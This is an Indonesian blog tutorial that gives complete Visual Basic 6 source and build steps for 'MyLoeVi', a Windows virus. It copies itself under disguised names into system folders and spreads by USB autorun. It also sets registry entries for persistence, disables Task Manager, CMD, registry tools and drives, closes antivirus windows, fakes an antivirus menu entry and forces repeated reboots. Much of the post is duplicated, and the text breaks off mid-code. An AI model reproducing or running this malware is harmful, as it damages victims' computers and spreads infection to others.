Kasih Komentar y..................
.jpg)
Selasa, 31 Januari 2012
Sabtu, 13 November 2010
Membuat Virus MyLoeVi dengan VB 6.0
Disini saya akan mencoba membuat sebuah virus dengan menggunakan VisualBasic 6.0. yang mana
virus ini cukup berbahaya, jadi hati2 supaya tidak kena komputer sendiri. Virus akan selalu me-Restart komputer
anda setiap 30 detik saat virus ini jalan.
Langsung aja y.............Buat sebuah Form dimana terdiri dari 1 CommandButton, 1 Label dan 2 Timer, serta
Property pada ControlBox dibuat False
Copykan Kode Berikut
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As
String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As_ Long,
ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive_ As
String)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwOptions As Long, ByVal_ dwReserved
As Long) As Long 'exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8
Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderWindows
Dim FolderPrograms
Dim FlashDisk
Dim TotalTenthDetik, TotalDetik, TenthDetik, Detik, a As Integer
Private Sub Command1_Click()
‘Anti MyLoeVi jika tidak sengaja menjalankan program d komputer sendiri.
Dim pass
pass = InputBox("Masukan Password Anti-MyLoeVi", "Password")
If pass = "close" Then ‘mengecek kode anti virus dengan password “close”
Timer1.Enabled = False
Timer2.Enabled = False
AntiRegestry
End
Else
Msgbox”Password salah…! Waktu kw tinggal “ & a & “ Detik lagi”,vbinformation,”informasi”
CopyRight@2010=====SICU/JEMO SERAWAI 2010
C o p y R i g h t @ 2 0 1 0 = = = = S I - C U / J E M O S E R A W A I
Halaman 2
End If
End Sub
Private Sub Form_Load()
On Error Resume Next
'acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#)
'menggandakan diri
Gandakefolder
InfeksiRegistry
MsgBox "Hy adek sanak, aQ datang untuk kalian segalonyo, terimo kasih y lah ndx bekawan", ,
"hy……"
End Sub
Private Sub InfeksiRegistry()
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 1,
"REG_DWORD" 'menghapus semua icon di dekstop
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments &
"\MyLoeVi.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & "c:\MyLoeVi.exe"""
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & "D:\System.exe"""
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderWindows & "\MyLoeVi.exe"""
'virus akan tetap berjalan pada Safe Mode
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites
& "\cssz.exe" 'virus akan tetap berjalan pada Safe Mode With Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 1, "REG_DWORD" 'Folder Options tak terlihat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 1, "REG_DWORD" 'Folder Options tak terlihat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSu
perHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSupe
rHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRe
gistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegi
stryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderTemplates & "\gWgTLoe.exe" 'gWgTLoe.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderSendTo & "\System.exe" 'System.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
1, "REG_DWORD" 'search pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
1, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose"
, 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose",
1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\",
FolderFavorites & "\cssz.exe" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi
bukan Antivirus yang dijalankan melainkan Virus cssz.exe yang terletak di Folder Favorite
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives
", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives",
4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileM
enu", 1, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun",
1, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_Sho
wControlPanel", 0, "REG_DWORD"
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertie
sMyComputer", 1, "REG_DWORD"
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoProperti
esMyComputer", 1, "REG_DWORD"
End Sub
Sub GandaKeFD()
‘Menggandakan diri ke Flasdisk
On Error Resume Next
If Dir(FlashDisk & "\MyLoeVi.exe") <> "MyLoeVi.exe" Then 'mengecek ada atau tdknya
MyLoeVi.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & "\MyLoeVi.exe", FlashDisk & "\MyLoeVi.exe"
SetAttr FlashDisk & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
End If
If Dir(FlashDisk & "\System.exe") <> "System.exe" Then 'mengecek ada atau tdknya System.exe di
flashdisk jika tdk ada kemudian
FileCopy FolderSendTo & "\System.exe", FlashDisk & "\System.exe"
SetAttr FlashDisk & "\System.exe", vbHidden + vbSystem + vbReadOnly
End If
BuatAutorunInf
End Sub
Sub BuatAutorunInf()
Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"
Print #1, "ACtIon=Open folder to view files"
Print #1, "Icon=MyLoeVi.exe"
Print #1, "Open=MyLoeVi.exe"
Print #1, "Open=System.exe"
Print #1, "ShellExecute=MyLoeVi.exe"
Print #1, "ShellExecute=System.exe"
Print #1, "Shell\Open\Command=MyLoeVi.exe"
Print #1, "sheLl\oPen\DefAulT=1"
Print #1, "shELl\opeN\cOmManD= MyLoeVi.exe"
Print #1, "Shell=Open"
Print #1, "shell\ExplorE\COMmANd=MyLoeVi.exe"
Print #1, "uSEAuToPLaY = 1"
Print #1, "SHell\autopLAy\commAND=MyLoeVi.exe"
Print #1, "SHell\autopLAy\commAND=System.exe"
Close #1
SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub
Sub Gandakefolder()
Set RegRun = CreateObject("WScript.Shell")
FolderStartUp = RegRun.specialfolders("StartUp")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")
FolderTemplates = RegRun.specialfolders("Templates")
FolderNetHood = RegRun.specialfolders("NetHood")
FolderPrintHood = RegRun.specialfolders("PrintHood")
FolderFavorites = RegRun.specialfolders("Favorites")
FolderSendTo = RegRun.specialfolders("SendTo")
FolderPrograms = RegRun.specialfolders("Programs")
FolderWindows = RegRun.specialfolder("Windows")
'membuat virus dengan nama hay.exe
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderStartUp & "\MyLoeVi.exe"
SetAttr FolderStartUp & "\hay.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderMyDocuments & "\MyLoeVi.exe"
SetAttr FolderMyDocuments & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama gWgTLoe.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderTemplates & "\gWgTLoe.exe"
SetAttr FolderTemplates & "\gWgTLoe.Exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama smzs.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderPrintHood & "\smzs.Exe"
SetAttr FolderPrintHood & "\smzs.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderNetHood & "\MyLoeVi.Exe"
SetAttr FolderNetHood & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama cssz.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderFavorites & "\cssz.Exe"
SetAttr FolderFavorites & "\cssz.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama System.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderSendTo & "\System.Exe"
SetAttr FolderSendTo & "\System.exe", vbHidden + vbSystem + vbReadOnly
'membuat virus dengan nama MyLoeVi.exe
FileCopy App.Path & "\" & App.EXEName & ".exe", FolderWindows & "\MyLoeVi.Exe"
SetAttr FolderWindows & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\MyLoeVi.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "D:\System.exe"
Gandakefolder
End Sub
Private Sub Timer1_Timer()
On Error Resume Next
'menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow("#32770", "RUN") 'jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "System Configuration Utility") 'msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Windows Task Manager") 'task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "Avira AntiVir Personal - Free Antivirus") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("#32770", "AntiVir Guard: Attention, Detection!") 'Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow("RegEdit_RegEdit", vbNullString) 'regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
InfeksiRegistry
End Sub
Private Sub Timer2_Timer()
On Error Resume Next
TotalTenthDetik = TotalTenthDetik + 1
TenthDetik = TotalTenthDetik Mod 60
TotalDetik = Int(TotalTenthDetik / 60)
Detik = TotalDetik Mod 60
a = 30 - Detik
Label1.Caption = "Time: " & a
Shell "C:\MyLoeVi.exe"
Shell "D:\System.exe"
If Len(Detik) = 1 Then
Detik = Detik
End If
If Detik / 2 = 1 Then
Timer1.Enabled = True
Gandakefolder
GandaKeFD
BuatAutorunInf
End If
If a = 0 Then
Timer2.Enabled = False
Shell "shutdown -r -t 3", vbHide
Me.Visible = False
MsgBox "Matilah Komputer kw ko dalam 3 detik!" & vbCrLf & "selamat jalan kekasih Q...",
vbOKOnly, "Good Bye..."
Shell "shutdown -r -t 3", vbHide
Timer2.Enabled = False
End If
Gandakefolder
InfeksiRegistry
App.TaskVisible = False
End Sub
Private Sub AntiRegestry()
‘anti regestry jika tidak sengaja virus dijalankan sehingga virus bisa dijinakan
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 0,
"REG_DWORD" 'menghapus semua icon di dekstop
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ 'virus akan tetap berjalan pada tipe
windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & """"
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & """"
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ 'virus akan tetap berjalan pada tipe
windows Safe Mode
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites
& "" 'virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 0, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 0, "REG_DWORD" 'Folder Options tdk dapat diakses
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSu
perHidden", 1, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSupe
rHidden", 1, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 0,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 0,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRe
gistryTools", 0, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegi
stryTools", 0, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderTemplates & "" 'gWgTLoe.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderSendTo & "" 'System.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
0, "REG_DWORD" 'search pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
0, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose"
, 0, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose",
0, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\",
FolderFavorites & "" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan
Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives
", 0, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives",
0, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileM
enu", 0, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun",
0, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_Sho
wControlPanel", 1, "REG_DWORD"
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertie
sMyComputer", 0, "REG_DWORD"
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoProperti
esMyComputer", 0, "REG_DWORD"
End Sub
Buat File EXE nya, dengan cara:
Klik File Make Project.Exe
MyLoeVi Siap dijalankan.
Jika anda menjalankan MyLoeVi dengan tidak sengaja, maka anda bisa menghentikannya
dengan cara mengklik tombol End pada form virus, terus masukan password’a, passwordnya disini
“close”
Setelah itu hapus file virusanya.
virus ini cukup berbahaya, jadi hati2 supaya tidak kena komputer sendiri. Virus akan selalu me-Restart komputer
anda setiap 30 detik saat virus ini jalan.
Langsung aja y.............Buat sebuah Form dimana terdiri dari 1 CommandButton, 1 Label dan 2 Timer, serta
Property pada ControlBox dibuat False
Copykan Kode Berikut
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As
String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As_ Long,
ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetDriveType& Lib "Kernel32" Alias "GetDriveTypeA" (ByVal nDrive_ As
String)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal dwOptions As Long, ByVal_ dwReserved
As Long) As Long 'exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8
Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderWindows
Dim FolderPrograms
Dim FlashDisk
Dim TotalTenthDetik, TotalDetik, TenthDetik, Detik, a As Integer
Private Sub Command1_Click()
‘Anti MyLoeVi jika tidak sengaja menjalankan program d komputer sendiri.
Dim pass
pass = InputBox("Masukan Password Anti-MyLoeVi", "Password")
If pass = "close" Then ‘mengecek kode anti virus dengan password “close”
Timer1.Enabled = False
Timer2.Enabled = False
AntiRegestry
End
Else
Msgbox”Password salah…! Waktu kw tinggal “ & a & “ Detik lagi”,vbinformation,”informasi”
CopyRight@2010=====SICU/JEMO SERAWAI 2010
C o p y R i g h t @ 2 0 1 0 = = = = S I - C U / J E M O S E R A W A I
Halaman 2
End If
End Sub
Private Sub Form_Load()
On Error Resume Next
'acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#)
'menggandakan diri
Gandakefolder
InfeksiRegistry
MsgBox "Hy adek sanak, aQ datang untuk kalian segalonyo, terimo kasih y lah ndx bekawan", ,
"hy……"
End Sub
Private Sub InfeksiRegistry()
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", 1,
"REG_DWORD" 'menghapus semua icon di dekstop
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderMyDocuments &
"\MyLoeVi.exe""" 'virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & "c:\MyLoeVi.exe"""
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & "D:\System.exe"""
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell", "Explorer.exe" & " """ & FolderWindows & "\MyLoeVi.exe"""
'virus akan tetap berjalan pada Safe Mode
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell", FolderFavorites
& "\cssz.exe" 'virus akan tetap berjalan pada Safe Mode With Command Prompt
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 1, "REG_DWORD" 'Folder Options tak terlihat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolder
Options", 1, "REG_DWORD" 'Folder Options tak terlihat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSu
perHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSupe
rHidden", 0, "REG_DWORD" 'Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD" 'Disable CMD dan File .Bat
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRe
gistryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegi
stryTools", 1, "REG_DWORD" 'registry tdk dapat diakses dan tdk dapat melakukan pengimporan file
berekstensi Reg
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderTemplates & "\gWgTLoe.exe" 'gWgTLoe.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon",
FolderSendTo & "\System.exe" 'System.exe berjalan pada saat startup
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
1, "REG_DWORD" 'search pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind",
1, "REG_DWORD" 'Ssearch pd star menu hilang
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose"
, 1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose",
1, "REG_DWORD" 'Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\",
FolderFavorites & "\cssz.exe" 'Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi
bukan Antivirus yang dijalankan melainkan Virus cssz.exe yang terletak di Folder Favorite
RegRun.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives
", 4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives",
4, "REG_DWORD" 'Drive C hilang
RegRun.regwrite
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileM
enu", 1, "REG_DWORD" 'Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun",
1, "REG_DWORD" 'Autorun pada CD atau USB
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\advanced\Start_Sho
wControlPanel", 0, "REG_DWORD"
RegRun.regwrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertie
sMyComputer", 1, "REG_DWORD"
RegRun.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoProperti
esMyComputer", 1, "REG_DWORD"
End Sub
Sub GandaKeFD()
‘Menggandakan diri ke Flasdisk
On Error Resume Next
If Dir(FlashDisk & "\MyLoeVi.exe") <> "MyLoeVi.exe" Then 'mengecek ada atau tdknya
MyLoeVi.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & "\MyLoeVi.exe", FlashDisk & "\MyLoeVi.exe"
SetAttr FlashDisk & "\MyLoeVi.exe", vbHidden + vbSystem + vbReadOnly
End If
If Dir(FlashDisk & "\System.exe") <> "System.exe" Then 'mengecek ada atau tdknya System.exe di
flashdisk jika tdk ada kemudian
FileCopy FolderSendTo & "\System.exe", FlashDisk & "\System.exe"
SetAttr FlashDisk & "\System.exe", vbHidden + vbSystem + vbReadOnly
End If
BuatAutorunInf
End Sub
Sub BuatAutorunInf()
Open FlashDisk & "\Autorun.Inf" For Output As 1
Print #1, "[AutoRun]"
Print #1, "ACtIon=Open folder to view files"
Print #1, "Icon=MyLoeVi.exe"
Print #1, "Open=MyLoeVi.exe"
Print #1, "Open=System.exe"
Print #1, "ShellExecute=MyLoeVi.exe"
Print #1, "ShellExecute=System.exe"
Print #1, "Shell\Open\Command=MyLoeVi.exe"
Print #1, "sheLl\oPen\DefAulT=1"
Print #1, "shELl\opeN\cOmManD= MyLoeVi.exe"
Print #1, "Shell=Open"
Print #1, "shell\ExplorE\COMmANd=MyLoeVi.exe"
Print #1, "uSEAuToPLaY = 1"
Print #1, "SHell\autopLAy\commAND=MyLoeVi.exe"
Print #1, "SHell\autopLAy\commAND=System.exe"
Close #1
SetAttr FlashDisk & "\Autorun.Inf", vbHidden + vbSystem + vbReadOnly
End Sub
Sub Gandakefolder()
Set RegRun = CreateObject("WScript.Shell")
FolderStartUp = RegRun.specialfolders("StartUp")
FolderMyDocuments = RegRun.specialfolders("MyDocuments")
FolderTemplates = RegRun.specialfolders("Templates")
FolderNetHood = RegRun.specialfolders("NetHood")
FolderPrintHood = RegRun.specialfolders("PrintHood")
FolderFavorites = RegRun.specialfolders("Favorites")
FolderSendTo = RegRun.specialfolders("SendTo")
FolderPrograms = RegRun.specialfolders("Programs")
FolderWindows = RegRun.specialfolder("Windows")
